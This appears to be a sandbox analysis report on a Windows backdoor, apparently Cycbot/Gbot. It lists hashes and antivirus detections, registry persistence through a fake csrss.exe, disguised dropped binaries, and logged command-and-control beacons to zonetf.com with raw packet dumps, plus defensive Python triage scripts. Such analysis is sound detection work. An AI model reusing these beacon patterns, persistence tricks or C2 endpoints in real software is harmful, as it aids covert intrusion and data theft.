Analysis Date: 2014-08-17 18:08:52
MD5: df539170709b3d68a0027855d28130b6
SHA1: d4b99753acdffdd452a296a05ad64bb233388f25

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386
Section .text   md5: e20f005f6bbc73f17d1d064aac567a06  sha1: b6cbc667069492f369d05f9e3424f69e4dd4611a  size: 121344
Section .rdata  md5: f32dd41836e1a6533462afdb9d12465d  sha1: 1d694979cf292d2f16eec3b11149da8ded343009  size: 1024
Section .data   md5: 48cc4c2d2ab73dd03e5ec75ba50ce3ce  sha1: e6046ff96a5e87fb312ec519d74041237d0e96fa  size: 56832
Section .apexi  md5: 763766d07bfe1d66ec03f6957926ece9  sha1: 72dbc34a0d2b5e2ba075dddbbea4ab3072dffdb4  size: 1024
Timestamp: 2005-09-26 09:41:37
Version:
  ProductVersion: 1.0.0.3
  FileVersion: 1.0.0.3
  PrivateBuild: 1556
PEhash: 29bc0868e7dde04c3fd5984850d0c426daaf4cc7
IMPhash: 2df3277c70999b6405861449672ea9ba
AV  360 Safe                        Gen:Trojan.Heur.KS.1
AV  Ad-Aware                        Gen:Trojan.Heur.KS.1
AV  Alwil (avast)                   Cybota [Trj]
AV  Arcabit (arcavir)               no_virus
AV  Authentium                      W32/Goolbot.G.gen!Eldorado
AV  Avira (antivir)                 BDS/Gbot.aida
AV  CA (E-Trust Ino)                Win32/Diple.A!generic
AV  CAT (quickheal)                 Backdoor.Cycbot.B
AV  ClamAV                          Trojan.Gbot-658
AV  Dr. Web                         BackDoor.Gbot.31
AV  Emsisoft                        Gen:Trojan.Heur.KS.1
AV  Eset (nod32)                    Win32/Kryptik.MIA
AV  Fortinet                        W32/FraudLoad.MK!tr
AV  Frisk (f-prot)                  W32/Goolbot.G.gen!Eldorado (generic, not disinfectable)
AV  F-Secure                        Gen:Trojan.Heur.KS.1
AV  Grisoft (avg)                   Win32/Heri
AV  Ikarus                          Backdoor.Win32.Gbot
AV  K7                              Backdoor ( 003210941 )
AV  Kaspersky                       Trojan.Win32.Generic
AV  MalwareBytes                    Trojan.Agent
AV  Mcafee                          BackDoor-EXI.gen.i
AV  Microsoft Security Essentials   Backdoor:Win32/Cycbot.G
AV  MicroWorld (escan)              Gen:Trojan.Heur.KS.1
AV  Norman                          winpe/Cycbot.BP
AV  Rising                          no_virus
AV  Sophos                          Mal/FakeAV-IS
AV  Symantec                        Backdoor.Cycbot!gen3
AV  Trend Micro                     BKDR_CYCBOT.SMX
AV  VirusBlokAda (vba32)            no_virus
AV  Yara APT                        no_virus
AV  Zillya!                         Trojan.Kryptik.Win32.149546
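The section table above carries a fourth section, .apexi, next to the usual .text/.rdata/.data, and a compile timestamp nine years older than the analysis date. The Python below is an added example, not part of the sandbox output and not the sample's code: it parses a PE32 section table with the standard library and flags the header facts an analyst checks before detonation (stamp age, section names outside the common set, sections that are both writable and executable). The sample itself is not reproduced; the test image is constructed from the section sizes in this report, the section flags and the list of "common" section names are editorial assumptions, and the report's timestamps are taken to be UTC.

```python
import datetime
import struct

# Section names the usual Microsoft/GNU toolchains emit. Anything else (".apexi" in
# this report) deserves a look: packers and protectors add their own. Editorial
# assumption, not something the report states.
COMMON_SECTIONS = {".text", ".rdata", ".data", ".idata", ".edata", ".rsrc", ".reloc",
                   ".bss", ".tls", ".pdata", ".xdata", ".CRT", ".textbss", ".gfids"}
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000
MAX_AGE_DAYS = 5 * 365  # assumption: older compile stamps get a manual look

# Values from the report. The report does not say UTC; that is assumed here.
REPORT_COMPILE_TS = int(datetime.datetime(2005, 9, 26, 9, 41, 37,
                                          tzinfo=datetime.timezone.utc).timestamp())
ANALYSIS_DATE = datetime.datetime(2014, 8, 17, 18, 8, 52, tzinfo=datetime.timezone.utc)
# (name, raw size, characteristics). Sizes are from the report; the flags are assumed
# for the constructed test image, since the report does not record them.
REPORT_LAYOUT = [(".text", 121344, 0x60000020), (".rdata", 1024, 0x40000040),
                 (".data", 56832, 0xC0000040), (".apexi", 1024, 0xE0000020)]


def build_test_pe(sections, timestamp):
    """Constructed header-only PE32 image for testing; not the sample from the report."""
    e_lfanew = 0x80
    dos = bytearray(e_lfanew)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    opt_size = 224  # IMAGE_OPTIONAL_HEADER32
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), timestamp, 0, 0, opt_size, 0x0102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)  # PE32 magic
    hdrs, raw_ptr = b"", 0x400
    for name, size, chars in sections:
        hdrs += struct.pack("<8sIIIIIIHHI", name.encode("ascii"), size, raw_ptr,
                            size, raw_ptr, 0, 0, 0, 0, chars)
        raw_ptr += size
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + hdrs


def parse_pe_headers(data):
    """Return (Machine, TimeDateStamp, [(name, VirtualSize, SizeOfRawData, Characteristics)])."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    machine, nsect, ts, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    off = e_lfanew + 24 + opt_size  # first IMAGE_SECTION_HEADER follows the optional header
    sections = []
    for _ in range(nsect):
        name, vsize, _, rawsize, _, _, _, _, _, chars = struct.unpack_from("<8sIIIIIIHHI", data, off)
        sections.append((name.rstrip(b"\0").decode("latin-1"), vsize, rawsize, chars))
        off += 40
    return machine, ts, sections


def triage(data, analysed_at):
    """Header facts worth a note before detonation: stamp age, odd section names, RWX sections."""
    _, ts, sections = parse_pe_headers(data)
    compiled = datetime.datetime.fromtimestamp(ts, datetime.timezone.utc)
    age = (analysed_at - compiled).days
    findings = []
    if age < 0:
        findings.append("compile timestamp is later than the analysis date")
    elif age > MAX_AGE_DAYS:
        findings.append(f"compile timestamp {compiled:%Y-%m-%d} is {age} days before analysis")
    for name, _, rawsize, chars in sections:
        if name not in COMMON_SECTIONS:
            findings.append(f"non-standard section {name!r} ({rawsize} bytes)")
        if chars & IMAGE_SCN_MEM_EXECUTE and chars & IMAGE_SCN_MEM_WRITE:
            findings.append(f"section {name!r} is writable and executable")
    return findings


def report_findings():
    """Run the checks against the constructed image that mirrors this report's layout."""
    return triage(build_test_pe(REPORT_LAYOUT, REPORT_COMPILE_TS), ANALYSIS_DATE)


if __name__ == "__main__":
    for line in report_findings():
        print(line)
```

On a real file, replace build_test_pe with the file's bytes; the parser only reads the headers, so a truncated or header-only dump is enough. A non-standard section name is a prompt to look for a packer, not proof of one, and an old TimeDateStamp may be forged or genuine; the PrivateBuild and version strings above are the next thing to compare it against.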

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ 1
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load ➝ C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates File: C:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates Process: C:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft
Creates Mutex: {4D92BB9F-9A66-458f-ACA4-66172A7016D4}
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: {61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex: {EEEB680D-AE62-4375-B93E-E9AE5FF585C1}
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: {B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS: 127.0.0.1
Winsock DNS: gravatar.com
Winsock DNS: extremerollerclub.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft

Creates Process: C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates Process: C:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\dwm.exe
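The runtime events above show three system-binary names (csrss.exe, dwm.exe, conhost.exe) written under the user profile instead of the Windows directory, a logon persistence value (HKEY_CURRENT_USER\...\Windows NT\CurrentVersion\Windows\Load) pointing at the Temp copy of csrss.exe, ProxyEnable set to 1 next to a lookup of 127.0.0.1, and a launcher convention of "<image> start<path>%<directory>". The Python below is an added example, not sandbox output and not the sample's code: it runs exactly those checks over an event list copied from this report. The set of system-binary names, the Windows-directory prefix, the age of the XP-style paths and the event tuple shape are editorial assumptions.

```python
import re

# Names of Windows system binaries that malware likes to borrow. Assumed list.
SYSTEM_BINARIES = {"csrss.exe", "dwm.exe", "conhost.exe", "smss.exe", "lsass.exe",
                   "svchost.exe", "winlogon.exe", "services.exe", "explorer.exe"}
# Where those names are legitimate on the XP-style layout seen in this report. Assumed.
WINDOWS_DIRS = ("c:\\windows\\",)
# Registry values, as written in the report, that mean logon persistence / proxy redirection.
LOGON_PERSISTENCE = {"hkey_current_user\\software\\microsoft\\windows nt\\currentversion\\windows\\load"}
PROXY_ENABLE = {"hkey_current_config\\software\\microsoft\\windows\\currentversion\\internet settings\\proxyenable"}
# The report's launcher convention: '<image> start<path to child>%<working directory>'.
LAUNCH_ARGS = re.compile(r"^start([a-z]:\\[^%]+)%([a-z]:\\.*)$", re.I)

# Events copied from the report's "Runtime Details". Registry rows are (kind, key, data).
REPORT_EVENTS = [
    ("Process", r"C:\malware.exe"),
    ("Registry", r"HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable", "1"),
    ("Registry", r"HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load",
     r"C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe"),
    ("Creates File", r"PIPE\lsarpc"),
    ("Creates File", r"C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe"),
    ("Creates File", r"C:\Documents and Settings\Administrator\Application Data\75DE.FFC"),
    ("Creates Process", r"C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe"
                        r"%C:\Documents and Settings\Administrator\Application Data"),
    ("Creates Process", r"C:\Documents and Settings\Administrator\Application Data\dwm.exe"),
    ("Creates Process", r"C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe"
                        r"%C:\Documents and Settings\Administrator\Application Data\Microsoft"),
    ("Creates Process", r"C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe"),
    ("Creates Mutex", "{4D92BB9F-9A66-458f-ACA4-66172A7016D4}"),
]


def split_cmdline(cmd):
    """Paths here contain spaces, so split only at the ' start' the launcher uses."""
    image, sep, rest = cmd.partition(" start")
    return image, ("start" + rest) if sep else ""


def check_events(events):
    """Return one finding string per suspicious event; an empty list means nothing matched."""
    findings = []
    for kind, *fields in events:
        if kind in ("Process", "Creates Process", "Creates File"):
            image, args = split_cmdline(fields[0])
            name = image.rsplit("\\", 1)[-1].lower()
            if name in SYSTEM_BINARIES and not image.lower().startswith(WINDOWS_DIRS):
                findings.append(f"{kind}: {name} outside the Windows directory: {image}")
            m = LAUNCH_ARGS.match(args)
            if m:
                findings.append(f"{kind}: launcher 'start<path>%<dir>' runs {m.group(1)} from {m.group(2)}")
        elif kind == "Registry":
            key, data = fields
            value_name = key.rsplit("\\", 1)[-1]
            if key.lower() in LOGON_PERSISTENCE:
                findings.append(f"Registry: logon persistence via {value_name} = {data}")
            elif key.lower() in PROXY_ENABLE and data.strip() == "1":
                findings.append("Registry: ProxyEnable = 1, traffic can be pushed through a local proxy")
    return findings


def report_findings():
    """The checks applied to this report's own events."""
    return check_events(REPORT_EVENTS)


if __name__ == "__main__":
    for line in report_findings():
        print(line)
```

The name check fires on file writes as well as process starts, so the Temp copy of csrss.exe is caught before it ever runs via the Load value. The Windows-directory prefix is deliberately coarse; on a real host compare against the exact System32 path and the binary's signature rather than the name alone.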

Network Details:

DNS: gravatar.com  Type: A  192.0.80.240
DNS: gravatar.com  Type: A  192.0.80.241
DNS: gravatar.com  Type: A  192.0.80.242
DNS: gravatar.com  Type: A  192.0.80.239
DNS: zonetf.com  Type: A  141.8.225.80
DNS: zonetf.com  Type: A  141.8.225.80
DNS: extremerollerclub.com  Type: A
HTTP GET: http://gravatar.com/avatar.php?gravatar_id=f2a3889aff6fc9711a3cbcfe64067be1?v55=92&tq=gKZEtzymKyxELk6C9E7mmOGAfMW4GyaJyGROsEX9cA%2FxBNhsle1cRrhd9WQAKPEKz1tAB96i%2FYv2uQ4G6z9ss02NgOBk6qxBVDqR8IrfdCqb62mbiN5fgysZy8Qs8NK1%2B6vIEsR8cFYpNHUwGyR8VtsIZnmh6%2B3uXgltAwU%2FmrgnQLpPPruLztei%2FZqLbGf0J%2BzJaddyi6qdpKO%2FjA4Vj5pwLYFwHtrQ7cCi57Uc47gUBLqIs5WhLb15ltfam7CJUC5DFShGP2oTBXmzQex4UZrF1gfQg4Mn%2B3Bxmpq3RzqiP2qG52wgn
User-Agent: mozilla/2.0
HTTP POST: http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2FMe%2BcoJuX%2BSNxFKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POST: http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88y%2BcoJsX%2BSNxFKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POST: http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88y%2BcoJtX%2BSNxFKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POST: http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2FMe%2BcoJuX%2BSNxVKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Flows TCP: 192.168.1.1:1031 ➝ 192.0.80.240:80
Flows TCP: 192.168.1.1:1033 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1034 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1035 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1036 ➝ 141.8.225.80:80

Raw Pcap
0x00000000 (00000)   47455420 2f617661 7461722e 7068703f   GET /avatar.php?
0x00000010 (00016)   67726176 61746172 5f69643d 66326133   gravatar_id=f2a3
0x00000020 (00032)   38383961 66663666 63393731 31613363   889aff6fc9711a3c
0x00000030 (00048)   62636665 36343036 37626531 3f763535   bcfe64067be1?v55
0x00000040 (00064)   3d393226 74713d67 4b5a4574 7a796d4b   =92&tq=gKZEtzymK
0x00000050 (00080)   7978454c 6b364339 45376d6d 4f474166   yxELk6C9E7mmOGAf
0x00000060 (00096)   4d573447 79614a79 47524f73 45583963   MW4GyaJyGROsEX9c
0x00000070 (00112)   41253246 78424e68 736c6531 63527268   A%2FxBNhsle1cRrh
0x00000080 (00128)   64395751 414b5045 4b7a3174 41423936   d9WQAKPEKz1tAB96
0x00000090 (00144)   69253246 59763275 51344736 7a397373   i%2FYv2uQ4G6z9ss
0x000000a0 (00160)   30324e67 4f426b36 71784256 44715238   02NgOBk6qxBVDqR8
0x000000b0 (00176)   49726664 43716236 326d6269 4e356667   IrfdCqb62mbiN5fg
0x000000c0 (00192)   79735a79 38517338 4e4b3125 32423676   ysZy8Qs8NK1%2B6v
0x000000d0 (00208)   49457352 38634659 704e4855 77477952   IEsR8cFYpNHUwGyR
0x000000e0 (00224)   38567473 495a6e6d 68362532 42337558   8VtsIZnmh6%2B3uX
0x000000f0 (00240)   676c7441 77552532 466d7267 6e514c70   gltAwU%2FmrgnQLp
0x00000100 (00256)   50507275 4c7a7465 69253246 5a714c62   PPruLztei%2FZqLb
0x00000110 (00272)   4766304a 2532427a 4a616464 79693671   Gf0J%2BzJaddyi6q
0x00000120 (00288)   64704b4f 2532466a 4134566a 3570774c   dpKO%2FjA4Vj5pwL
0x00000130 (00304)   59467748 74725137 63436935 37556334   YFwHtrQ7cCi57Uc4
0x00000140 (00320)   37675542 4c714973 3557684c 6231356c   7gUBLqIs5WhLb15l
0x00000150 (00336)   7466616d 37434a55 43354446 53684750   tfam7CJUC5DFShGP
0x00000160 (00352)   326f5442 586d7a51 65783455 5a724631   2oTBXmzQex4UZrF1
0x00000170 (00368)   67665167 344d6e25 32423342 786d7071   gfQg4Mn%2B3Bxmpq
0x00000180 (00384)   33527a71 69503271 47353277 676e2048   3RzqiP2qG52wgn H
0x00000190 (00400)   5454502f 312e300d 0a436f6e 6e656374   TTP/1.0..Connect
0x000001a0 (00416)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x000001b0 (00432)   3a206772 61766174 61722e63 6f6d0d0a   : gravatar.com..
0x000001c0 (00448)   41636365 70743a20 2a2f2a0d 0a557365   Accept: */*..Use
0x000001d0 (00464)   722d4167 656e743a 206d6f7a 696c6c61   r-Agent: mozilla
0x000001e0 (00480)   2f322e30 0d0a0d0a                     /2.0....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4e6f5825 32425039 68253242 49307344   NoX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a682532 464d6525 3242636f   OhLgjh%2FMe%2Bco
0x000000c0 (00192)   4a755825 3242534e 78464b76 39373558   JuX%2BSNxFKv975X
0x000000d0 (00208)   6c6d3547 20485454 502f312e 310d0a48   lm5G HTTP/1.1..H
0x000000e0 (00224)   6f73743a 207a6f6e 6574662e 636f6d0d   ost: zonetf.com.
0x000000f0 (00240)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000100 (00256)   696c6c61 2f342e30 2028636f 6d706174   illa/4.0 (compat
0x00000110 (00272)   69626c65 3b204d53 49452036 2e303b20   ible; MSIE 6.0; 
0x00000120 (00288)   57696e64 6f777320 4e542035 2e31290d   Windows NT 5.1).
0x00000130 (00304)   0a436f6e 74656e74 2d4c656e 6774683a   .Content-Length:
0x00000140 (00320)   20300d0a 436f6e6e 65637469 6f6e3a20    0..Connection: 
0x00000150 (00336)   636c6f73 650d0a0d 0a354446 53684750   close....5DFShGP
0x00000160 (00352)   326f5442 586d7a51 65783455 5a724631   2oTBXmzQex4UZrF1
0x00000170 (00368)   67665167 344d6e25 32423342 786d7071   gfQg4Mn%2B3Bxmpq
0x00000180 (00384)   33527a71 69503271 47353277 676e2048   3RzqiP2qG52wgn H
0x00000190 (00400)   5454502f 312e300d 0a436f6e 6e656374   TTP/1.0..Connect
0x000001a0 (00416)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x000001b0 (00432)   3a206772 61766174 61722e63 6f6d0d0a   : gravatar.com..
0x000001c0 (00448)   41636365 70743a20 2a2f2a0d 0a557365   Accept: */*..Use
0x000001d0 (00464)   722d4167 656e743a 206d6f7a 696c6c61   r-Agent: mozilla
0x000001e0 (00480)   2f322e30 0d0a0d0a                     /2.0....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4e6f5825 32425039 68253242 49307344   NoX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683838 79253242 636f4a73   OhLgjh88y%2BcoJs
0x000000c0 (00192)   58253242 534e7846 4b763937 35586c6d   X%2BSNxFKv975Xlm
0x000000d0 (00208)   35472048 5454502f 312e310d 0a486f73   5G HTTP/1.1..Hos
0x000000e0 (00224)   743a207a 6f6e6574 662e636f 6d0d0a55   t: zonetf.com..U
0x000000f0 (00240)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000100 (00256)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x00000110 (00272)   6c653b20 4d534945 20362e30 3b205769   le; MSIE 6.0; Wi
0x00000120 (00288)   6e646f77 73204e54 20352e31 290d0a43   ndows NT 5.1)..C
0x00000130 (00304)   6f6e7465 6e742d4c 656e6774 683a2030   ontent-Length: 0
0x00000140 (00320)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000150 (00336)   6f73650d 0a0d0a3c 6872202f 3e0a2020   ose....<hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4e6f5825 32425039 68253242 49307344   NoX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683838 79253242 636f4a74   OhLgjh88y%2BcoJt
0x000000c0 (00192)   58253242 534e7846 4b763937 35586c6d   X%2BSNxFKv975Xlm
0x000000d0 (00208)   35472048 5454502f 312e310d 0a486f73   5G HTTP/1.1..Hos
0x000000e0 (00224)   743a207a 6f6e6574 662e636f 6d0d0a55   t: zonetf.com..U
0x000000f0 (00240)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000100 (00256)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x00000110 (00272)   6c653b20 4d534945 20362e30 3b205769   le; MSIE 6.0; Wi
0x00000120 (00288)   6e646f77 73204e54 20352e31 290d0a43   ndows NT 5.1)..C
0x00000130 (00304)   6f6e7465 6e742d4c 656e6774 683a2030   ontent-Length: 0
0x00000140 (00320)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000150 (00336)   6f73650d 0a0d0a0d 0a354446 53684750   ose......5DFShGP
0x00000160 (00352)   326f5442 586d7a51 65783455 5a724631   2oTBXmzQex4UZrF1
0x00000170 (00368)   67665167 344d6e25 32423342 786d7071   gfQg4Mn%2B3Bxmpq
0x00000180 (00384)   33527a71 69503271 47353277 676e2048   3RzqiP2qG52wgn H
0x00000190 (00400)   5454502f 312e300d 0a436f6e 6e656374   TTP/1.0..Connect
0x000001a0 (00416)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x000001b0 (00432)   3a206772 61766174 61722e63 6f6d0d0a   : gravatar.com..
0x000001c0 (00448)   41636365 70743a20 2a2f2a0d 0a557365   Accept: */*..Use
0x000001d0 (00464)   722d4167 656e743a 206d6f7a 696c6c61   r-Agent: mozilla
0x000001e0 (00480)   2f322e30 0d0a0d0a                     /2.0....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4e6f5825 32425039 68253242 49307344   NoX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a682532 464d6525 3242636f   OhLgjh%2FMe%2Bco
0x000000c0 (00192)   4a755825 3242534e 78564b76 39373558   JuX%2BSNxVKv975X
0x000000d0 (00208)   6c6d3547 20485454 502f312e 310d0a48   lm5G HTTP/1.1..H
0x000000e0 (00224)   6f73743a 207a6f6e 6574662e 636f6d0d   ost: zonetf.com.
0x000000f0 (00240)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000100 (00256)   696c6c61 2f342e30 2028636f 6d706174   illa/4.0 (compat
0x00000110 (00272)   69626c65 3b204d53 49452036 2e303b20   ible; MSIE 6.0; 
0x00000120 (00288)   57696e64 6f777320 4e542035 2e31290d   Windows NT 5.1).
0x00000130 (00304)   0a436f6e 74656e74 2d4c656e 6774683a   .Content-Length:
0x00000140 (00320)   20300d0a 436f6e6e 65637469 6f6e3a20    0..Connection: 
0x00000150 (00336)   636c6f73 650d0a0d 0a72202f 3e0a2020   close....r />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.
